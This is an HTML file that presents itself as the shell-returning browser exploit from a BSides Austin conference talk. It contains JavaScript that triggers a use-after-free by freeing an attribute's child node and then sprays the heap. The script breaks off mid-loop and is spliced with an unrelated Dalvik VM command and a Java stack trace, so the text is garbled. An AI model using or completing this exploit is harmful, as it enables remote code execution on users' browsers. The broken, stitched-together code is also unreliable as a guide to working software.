<html>
<!--
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->
<head>
<script language="JavaScript">
function heap()
{
var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };
# dalvikvm -cp /data/pdx.jar PdxActivity
dalvikvm -cp /data/pdx.jar PdxActivity
Dalvik VM unable to locate class 'PdxActivity'
java.lang.NoClassDefFoundError: PdxActivity
at dalvik.system.NativeStart.main(Native Method)
Caused by: java.lang.ClassNotFoundException: PdxActivity in loader dalvik.system.Pa
thClassLoader[/data/pdx.jar]
at dalvik.system.PathClassLoader.findClass(PathClassLoader.java:240)
at java.lang.ClassLoader.loadClass(ClassLoader.java:551)
at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
... 1 more